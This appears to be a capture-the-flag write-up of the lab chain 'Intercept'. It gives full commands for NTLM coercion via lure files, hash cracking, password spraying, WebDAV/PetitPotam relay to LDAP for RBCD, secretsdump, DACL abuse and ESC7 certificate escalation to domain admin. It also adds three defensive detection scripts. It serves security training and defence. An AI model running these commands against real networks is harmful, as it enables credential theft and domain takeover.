Intercept, a hard-rated chain machine, involved two machines, WS01 and DC01. On WS01 we coerce NTLM authentication by uploading files of different extensions to a share to grab a user's hash, perform Resource Based Constrained Delegation (RBCD) by utilizing WebDAV and PetitPotam to relay WS01's hash through LDAP, abuse GenericAll to add a user to ca-managers, and abuse ESC7 (Vulnerable Certificate Authority Access Control) to become domain admin.
NMAP
DC01.intercept.vl
PORT STATE SERVICE REASON VERSION
53/tcp open tcpwrapped syn-ack ttl 127
135/tcp open tcpwrapped syn-ack ttl 127
139/tcp open tcpwrapped syn-ack ttl 127
389/tcp open tcpwrapped syn-ack ttl 127
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.intercept.vl
445/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127
49664/tcp open tcpwrapped syn-ack ttl 127
54368/tcp open tcpwrapped syn-ack ttl 127
55463/tcp open tcpwrapped syn-ack ttl 127
WS01.intercept.vl
PORT STATE SERVICE REASON VERSION
135/tcp open tcpwrapped syn-ack ttl 127
139/tcp open tcpwrapped syn-ack ttl 127
445/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127
| ssl-cert: Subject: commonName=WS01.intercept.vl
| Issuer: commonName=WS01.intercept.vl
| Public Key type: rsa
| Public Key bits: 2048
Enumerating the SMB shares, we have the dev and Users shares on WS01.
We can access the dev share with null authentication; it contains a readme stating that this share gets checked.
The tools folder contains Autologon64.exe.
This tells us that a user will constantly look into this folder, so we can try coercing NTLM authentication. To do that we can place .scf, .url, .lnk and other files that contain a UNC path to our IP; the ntlm_theft script can generate all of these files for us rather than spending time doing it manually.
python3 ./ntlm_theft.py -s 10.8.0.136 --generate all --filename @
With prompt off and mput * we can upload all of these files to the dev SMB share.
As soon as these files are uploaded, we get the NTLMv2 hash of Kathryn.Spencer on Responder.
We could try cracking it, but first let's see if we can relay it to DC01 by checking whether SMB signing is disabled.
SMB signing is enabled, so we can't relay it, and the only option we have here is to crack the hash. Using hashcat we crack it with the password Chocolate1.
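The share-poisoning step above is also what a defender would want to spot on a writable share. The following is an added example, not code from the writeup or from ntlm_theft: it walks a share directory, looks inside lure-type files (.scf, .url, .lnk and friends) for UNC or file:// targets, and flags any host that is neither an internal IP range nor under the trusted domain. The sample files, the 192.0.2.10 address and the trusted ranges are constructed for the demo.

```python
import ipaddress, re, tempfile
from pathlib import Path

# Extensions ntlm_theft-style lures use; each carries a UNC/file:// path that makes Explorer
# or the opening application authenticate outbound as soon as the share is browsed.
LURE_EXTENSIONS = {".scf", ".url", ".lnk", ".library-ms", ".rtf", ".xml", ".htm", ".html", ".ini"}
# Matched on raw bytes so binary formats are covered; the UTF-16LE pattern handles .lnk targets.
_UNC_ASCII = re.compile(rb"\\\\([A-Za-z0-9._-]+)\\")
_UNC_UTF16 = re.compile(rb"\\\x00\\\x00((?:[A-Za-z0-9._-]\x00)+)\\\x00")
_FILE_URL = re.compile(rb"file://([A-Za-z0-9._-]+)/", re.IGNORECASE)

def extract_hosts(data):
    """Every host named as a UNC or file:// target inside a file's bytes."""
    hosts = {m.group(1).decode("ascii", "ignore") for m in _UNC_ASCII.finditer(data)}
    hosts |= {m.group(1).decode("utf-16-le", "ignore") for m in _UNC_UTF16.finditer(data)}
    hosts |= {m.group(1).decode("ascii", "ignore") for m in _FILE_URL.finditer(data)}
    return hosts

def is_trusted(host, trusted_nets, trusted_names):
    """Trusted = IP inside an internal range, or a name equal to / under a trusted domain."""
    host = host.lower().rstrip(".")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host in trusted_names or any(host.endswith("." + n) for n in trusted_names)
    return any(ip in net for net in trusted_nets)

def scan_share(root, trusted_nets, trusted_names):
    findings = []  # (relative path, untrusted host) for every lure-type file under root
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in LURE_EXTENSIONS:
            for host in sorted(extract_hosts(path.read_bytes())):
                if not is_trusted(host, trusted_nets, trusted_names):
                    findings.append((path.relative_to(root).as_posix(), host))
    return findings

def demo():
    # Constructed share contents (not the box's files): two lures, one benign shortcut, one .lnk stand-in.
    samples = {
        "tools/readme.scf": b"[Shell]\r\nCommand=2\r\nIconFile=\\\\192.0.2.10\\share\\i.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n",
        "tools/@notes.url": b"[InternetShortcut]\r\nURL=file://192.0.2.10/share/notes.html\r\nIconFile=\\\\192.0.2.10\\share\\n.ico\r\n",
        "tools/intranet.url": b"[InternetShortcut]\r\nURL=file://dc01.intercept.vl/dev/readme.txt\r\n",
        "tools/fake.lnk": b"L\x00\x00\x00" + "\\\\192.0.2.10\\share\\".encode("utf-16-le"),  # not a real ShellLink
    }
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, data in samples.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_bytes(data)
        return scan_share(root, [ipaddress.ip_network("10.10.0.0/16")], {"intercept.vl"})
```

Running this periodically over the share (or on a file-creation event) gives the file and the foreign host in one line, which is enough to pull the file and block the egress before a user browses the folder.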
hashcat -a 0 -m 5600 ./hash.txt /usr/share/wordlists/rockyou.txt
We can verify that we now have a valid domain user.
Now we can enumerate the domain with python-bloodhound.
python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'intercept.vl' -u 'KATHRYN.SPENCER' -p 'Chocolate1' -gc 'DC01.intercept.vl' -c all -ns 10.10.240.133
From BloodHound, this user is only a member of the intercept-users group.
We can try spraying the password against other domain users by retrieving the usernames from LDAP with windapsearch.
windapsearch -u 'KATHRYN.SPENCER' -p 'Chocolate1' -d 'intercept.vl' -m users --dc 10.10.240.133 | grep sAMAccountName | awk -F: '{ print $2 }' | awk '{ gsub(/ /,""); print }'
But this password didn't work for any other user.
Taking a hint from the vulnlab wiki, which mentions looking into LDAP signing and the WebClient service, we can check whether these are enabled with the help of crackmapexec.
Performing RBCD to get Administrator (WS01)
The WebClient (WebDAV) service is enabled on WS01, which can be abused to coerce authentication when combined with PetitPotam. We'll coerce WS01 to authenticate to DC01; since LDAP signing is disabled, this can be relayed with ntlmrelayx through LDAP, and we can add a machine account with delegation privileges to WS01, meaning we can perform resource based constrained delegation (RBCD) on WS01 and impersonate the administrator.
The issue is that for the coerced authentication to reach us, our host needs to be in the intranet zone: it must be a domain-joined machine, or we must create a valid DNS entry for it. Start Responder with HTTP set to off and note down the hostname it generates for us.
Adding a DNS entry for this hostname with dnstool.py
python3 dnstool.py -u 'intercept.vl\KATHRYN.SPENCER' -p Chocolate1 --action add --record WIN-6U9AIDU8LOC.intercept.vl --data 10.8.0.136 --type A 10.10.172.149
Running ntlmrelayx with --delegate-access against DC01
ntlmrelayx.py -t ldaps://10.10.172.149 --delegate-access -smb2support
And finally we run petitpotam.py against WS01
python3 petitpotam.py -d "intercept.vl" -u "KATHRYN.SPENCER" -p "Chocolate1" WIN-6U9AIDU8LOC@80/randomfile.txt 10.10.172.150
From the output of ntlmrelayx, we see that a machine account has been created with delegation rights to impersonate any user on WS01.
We can verify this by checking the attributes of WS01 with rbcd.py.
Now with getST.py we can request a service ticket for the Administrator user on WS01
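The attribute rbcd.py reads here is msDS-AllowedToActOnBehalfOfOtherIdentity, a binary security descriptor whose DACL lists the SIDs allowed to delegate to WS01. The block below is an added example, not rbcd.py or impacket code: it decodes that descriptor from raw bytes and reports any SID that is not on an approved list, which is the check a defender runs to catch a newly added machine account like the one the relay created. The domain SID and RIDs are constructed; in practice the bytes come from an LDAP read of the computer object.

```python
import struct

# Constructed example values; real SIDs come from the directory.
DOMAIN_SID = "S-1-5-21-111111111-222222222-333333333"

def sid_bytes(sid):
    """Encode an S-1-5-... string as a binary SID (revision, count, 48-bit authority, subauthorities)."""
    rev, auth, *subs = (int(p) for p in sid.split("-")[1:])
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def parse_sid(buf, off):
    rev, count = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d%s" % (rev, auth, "".join("-%d" % s for s in subs))

def build_rbcd_sd(sids, mask=0x000F01FF):
    """Self-relative SECURITY_DESCRIPTOR with one ACCESS_ALLOWED ACE per SID (what the attribute holds)."""
    aces = b"".join(struct.pack("<BBHI", 0, 0, 8 + len(s), mask) + s for s in map(sid_bytes, sids))
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces  # ACL_REVISION = 2
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl  # SELF_RELATIVE|DACL_PRESENT, DACL at 20

def rbcd_principals(sd):
    """[(sid, mask)] for every ACCESS_ALLOWED ACE in the DACL; these SIDs may delegate to the computer."""
    if len(sd) < 20:
        return []
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & 0x0004 or off_dacl == 0:  # no DACL present
        return []
    ace_count = struct.unpack_from("<BBHHH", sd, off_dacl)[3]
    pos, out = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == 0:  # ACCESS_ALLOWED_ACE_TYPE; object ACEs are not used in this attribute
            out.append((parse_sid(sd, pos + 8), struct.unpack_from("<I", sd, pos + 4)[0]))
        pos += ace_size
    return out

def unexpected_rbcd(sd, approved_sids):
    """SIDs allowed to act on behalf of the computer that are not on the approved list."""
    return [sid for sid, _ in rbcd_principals(sd) if sid not in approved_sids]

if __name__ == "__main__":
    # A legitimate front-end service account plus a freshly created, unknown machine account.
    sd = build_rbcd_sd([DOMAIN_SID + "-1105", DOMAIN_SID + "-5601"])
    print(unexpected_rbcd(sd, {DOMAIN_SID + "-1105"}))
```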
getST.py -spn 'cifs/WS01.intercept.vl' -impersonate Administrator -dc-ip 10.10.172.149 'intercept/JELZDXBK$':'k)^g,*no2IwtvZY'
Dumping the SAM hashes with secretsdump.py
secretsdump.py administrator@WS01.intercept.vl -k -no-pass
From the output we get another domain user's credentials, simon.bowen. From BloodHound, this user has GenericAll on the ca-managers group.
Running certipy to check what access rights the groups have on certificates
certipy find -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -vulnerable -stdout -dc-ip 10.10.172.149
Vulnerable Certificate Authority Access Control (ESC7)
Here the ca-managers group has the ManageCa permission, which allows changing the CA's settings to enable Subject Alternative Name (SAN) on all certificate templates by setting the EDITF_ATTRIBUTESUBJECTALTNAME2 property, which in turn lets users request a certificate for any domain user; this is what is dubbed ESC7.
We need to add Simon to the ca-managers group. This can be done by first becoming the owner of the group, giving full control to Simon and then adding him to the group; for that we can use owneredit.py and dacledit.py, and we need the old version of impacket, so we enable a Python virtual environment.
For using dacledit.py:
git clone --branch dacledit https://github.com/ShutdownRepo/impacket.git
We can also just copy owneredit.py.
python3 ./owneredit.py -action write -target 'ca-managers' -new-owner 'Simon.Bowen' 'intercept.vl'/'Simon.Bowen':'b0OI_fHO859+Aw' -dc-ip 10.10.172.149
Now giving full control over the ca-managers object
dacledit.py -action 'write' -rights 'FullControl' -principal 'Simon.Bowen' -target 'ca-managers' 'intercept.vl'/'Simon.Bowen':'b0OI_fHO859+Aw' -dc-ip 10.10.172.149
Adding Simon to the ca-managers group with net rpc
net rpc group addmem 'ca-managers' 'Simon.Bowen' -U intercept.vl/Simon.Bowen -S DC01.intercept.vl
To verify that Simon is in the ca-managers group, we can re-run python-bloodhound and check the data there.
Moving back to certipy, we're going to make Simon a CA officer, which grants the ManageCertificates right needed to validate the failed request.
certipy ca -ca 'INTERCEPT-DC01-CA' -add-officer 'Simon.Bowen' -u 'Simon.Bowen@intercept.vl' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.172.149
Now we list the certificate templates to check whether SubCA is enabled
certipy ca -u "Simon.Bowen@intercept.vl" -p "b0OI_fHO859+Aw" -dc-ip "10.10.172.149" -ca 'INTERCEPT-DC01-CA' -list-templates
Requesting a certificate for the administrator using the SubCA template; it will be denied, but we'll still be able to save the private key
certipy req -u 'Simon.Bowen@intercept.vl' -p 'b0OI_fHO859+Aw' -ca INTERCEPT-DC01-CA -dc-ip 10.10.172.149 -template SubCA -upn administrator@intercept.vl
Having the ManageCertificates right, we can validate the failed request since we have the key
certipy ca -ca 'INTERCEPT-DC01-CA' -issue-request 3 -u 'Simon.Bowen@intercept.vl' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.172.149
And then retrieving the administrator's certificate
certipy req -ca 'INTERCEPT-DC01-CA' -retrieve 3 -u 'Simon.Bowen@intercept.vl' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.172.149
All that is left is to retrieve the NT hash with the certificate
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'intercept.vl' -dc-ip 10.10.172.149
We can then log in through WinRM on DC01.
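The ESC7 chain above leaves a distinctive trace on the CA: a request denied for the SubCA template and then issued anyway by the same freshly minted officer, right after the certificate-manager settings changed. The block below is an added detection example, not part of the writeup or of certipy; it assumes the CA's "Issue and manage certificate requests" auditing is on and uses the standard event IDs (4888 denied, 4887 approved and issued, 4890 certificate manager settings changed). The event records are constructed and reduced to the few fields the check needs, not real event XML.

```python
# Constructed, field-reduced CA audit records (not real event XML). IDs from the
# "Issue and manage certificate requests" audit subcategory: 4888 = request denied,
# 4887 = request approved and certificate issued, 4890 = certificate manager settings changed.
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:00", "id": 4890, "user": "INTERCEPT\\Simon.Bowen", "request": None, "template": None},
    {"time": "2024-01-01T10:01:00", "id": 4888, "user": "INTERCEPT\\Simon.Bowen", "request": 3, "template": "SubCA"},
    {"time": "2024-01-01T10:02:00", "id": 4887, "user": "INTERCEPT\\Simon.Bowen", "request": 3, "template": "SubCA"},
    {"time": "2024-01-01T10:03:00", "id": 4887, "user": "INTERCEPT\\Kathryn.Spencer", "request": 4, "template": "User"},
]

def issued_after_denial(events, setting_change_ids=(4890,)):
    """Requests that were denied (4888) and later issued anyway (4887): the ESC7 resubmit pattern.

    Each hit also carries every certificate-manager settings change seen before the issuance,
    since a ManageCA holder has to grant ManageCertificates (add an officer) before resubmitting."""
    denied, setting_changes, hits = {}, [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] in setting_change_ids:
            setting_changes.append((ev["time"], ev["user"]))
        elif ev["id"] == 4888:
            denied[ev["request"]] = ev
        elif ev["id"] == 4887 and ev["request"] in denied:
            hits.append({
                "request": ev["request"],
                "template": ev["template"],
                "denied_at": denied[ev["request"]]["time"],
                "issued_at": ev["time"],
                "issued_by": ev["user"],
                "preceding_setting_changes": list(setting_changes),
                # SubCA is the template this technique leans on, so weight it higher.
                "severity": "high" if ev["template"] == "SubCA" else "medium",
            })
    return hits

if __name__ == "__main__":
    for hit in issued_after_denial(SAMPLE_EVENTS):
        print(hit)
```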
References
- https://github.com/Greenwolf/ntlm_theft
- https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient
- https://www.hackingarticles.in/lateral-movement-webclient-workstation-takeover/
- https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py
- https://www.r-tec.net/r-tec-blog-resource-based-constrained-delegation.html
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
- https://www.tarlogic.com/blog/ad-cs-esc7-attack/
- https://github.com/ShutdownRepo/impacket
- https://github.com/ShutdownRepo/impacket/blob/owneredit/examples/owneredit.py